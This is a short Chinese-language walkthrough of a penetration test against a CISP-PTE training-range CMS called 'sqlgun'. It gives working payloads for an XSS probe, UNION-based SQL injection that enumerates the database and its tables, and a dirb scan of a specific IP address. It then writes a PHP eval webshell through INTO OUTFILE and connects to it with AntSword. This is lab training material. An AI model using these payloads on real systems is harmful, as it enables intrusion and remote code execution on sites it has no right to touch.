CISP-PTE CMS sqlgun靶场渗透测试

cc7752102024-09-14 9:06

1.打开靶场

2.在搜索框尝试xss

<script>alert(1)</script>

发现此处存在xss漏洞

3.在搜索框尝试sql注入

-1' union select 1,2,3# 发现页面有回显

4.查询数据库名

-1' union select 1,database(),3#

5.查询数据库的所有表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'),3#

6.扫描敏感目录

dirb http://124.221.58.83:8081

7.访问phpinfo

可以看见网站的绝对路径

8.通过sql注入写入一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/1.php' #

9.访问写入的php文件

10.使用蚁剑进行连接

相关推荐
安全漏洞防治中心1 小时前
Roadmap:一年实现安全漏洞防治自动化
运维·web安全·网络安全·自动化·漏洞管理·漏洞处置sop·漏洞紧急修复建议
Bruce_Liuxiaowei3 小时前
使用批处理脚本安全清理Windows系统垃圾
网络·windows·安全·网络安全
lingggggaaaa3 小时前
小迪安全v2023学习笔记(七十讲)—— Python安全&SSTI模板注入&项目工具
笔记·python·学习·安全·web安全·网络安全·ssti
云手机掌柜10 小时前
亚矩阵云手机:亚马逊第三方店铺多账号安全合规运营的核心技术支撑
安全·智能手机·矩阵·手机
往日情怀酿做酒 V176392963811 小时前
信息收集5----(信息收集综合利用工具)
安全
曼岛_14 小时前
[系统架构设计师]安全架构设计理论与实践(十八)
安全·系统架构·安全架构·系统架构设计师
艾小码17 小时前
前端安全防护手册:对抗XSS、CSRF、点击劫持等攻击
前端·安全·xss
网硕互联的小客服19 小时前
如何配置安全的SFTP服务器?
运维·服务器·安全
飞凌嵌入式20 小时前
高性能、高实时、高安全:如何在飞凌嵌入式i.MX95xx核心板上同时实现?
嵌入式硬件·安全·嵌入式·飞凌嵌入式
热门推荐
01UV安装并设置国内源02KGG转MP3工具|非KGM文件|解密音频03【踩坑笔记】50系显卡适配的 PyTorch 安装04Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code05蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接0620个国内外主流AI绘画工具大汇总(最新免费可用~)07Claude Code VSCode集成开发指南:AI编程助手完整配置08【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)092025最新国内服务器可用docker源仓库地址大全(2025年8月更新)10DeepSeek更新!速览DeepSeek V3.1新特性